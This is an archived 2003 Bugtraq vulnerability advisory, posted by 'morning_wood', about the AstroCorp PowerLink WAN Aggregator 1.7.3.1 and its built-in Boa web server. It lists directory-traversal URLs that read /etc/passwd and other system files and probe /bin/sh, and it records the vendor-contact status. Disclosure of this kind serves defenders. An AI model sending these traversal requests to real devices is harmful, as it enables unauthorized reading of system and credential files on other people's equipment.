| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
Message-ID: <Law11-OE66uaNdwmkQS000041fe@hotmail.com> Date: Fri, 9 May 2003 10:52:45 -0700 From: "morning_wood" <se_cur_ity@...mail.com> To: <bugtraq@...urityfocus.com> Subject: PowerLink WAN Aggregator - Vunerability Vendor: AstroCorp Website:http://www.astrocorp.com/ Product:PowerLinkT WAN Aggregator Version: 1.7.3.1 Discoved: 01/10/2003 By: morning_wood Release Date: 05/07/2003 Exploit Type: Arbitrary reading of files / Directory Transversal / Remote Shell? Discription of Product: "PowerLinkT WAN Aggregator is an Intelligent Link Load Balancing with Automatic WAN Fail-Over for 100% Always Available Internet Connectivity! An interesting way to increase Broadband bandwidth among several connections. Simply put - (4) Incoming WAN Ports & (1) LAN port, Web Browser Configurable. Balance that Load! Let's see, this device (PowerLink) + Smoothwall.org for a Hardware Firewall - Nice! PowerLink-Iplus WAN Aggregator for $1,695.00 (8/13/2002)." Known issues exist in Boa httpd as per: FreeBSD-SA-00:60 Security Advisory http://www.securiteam.com/unixfocus/6G0081P0AI.html and http://lists.insecure.org/lists/bugtraq/2000/Oct/0445.html Since this is a hardware based product with a built in httpd for remote access, this is a seperate issue than the ones formaly presented above, but carry the same implications. Identification: HTTP/1.0 200 OK Date: Saturday, 7 January 100 04:23:02 GMT Server: Boa/0.92r Connection: close Keep-Alive: timeout=10, max=10 Content-Length: 4187 Last-Modified: Tuesday, 9 September 102 03:21:14 GMT Content-Type: text/html Vunerability / Exploit: Just issue any of the folowing... http://somepowerlinkWAN.router/../../../../../../../../../../etc/passwd http://somepowerlinkWAN.router///etc/passwd http://somepowerlinkWAN.router/etc/passwd http://somepowerlinkWAN.router/bin/ http://somepowerlinkWAN.router/dev/ http://somepowerlinkWAN.router/tmp/ http://somepowerlinkWAN.router/etc/fstab http://somepowerlinkWAN.router/etc/mtab etc, etc, etc I am most concerned about this: http://somepowerlinkWAN.router/bin/sh as it seems to want send me a shell? ( at least the actual sh bin - rofl ) Vendor contacted: Yes via: 1-800-669-6242 and acorbuleanu@...rocorp.com Response: Initial Phone Conversation. Resolve: None as of this date Credits: morning_wood - Security Consultant se_cur_ity@...mail.com http://exploit.wox.org
Powered by blists - more mailing lists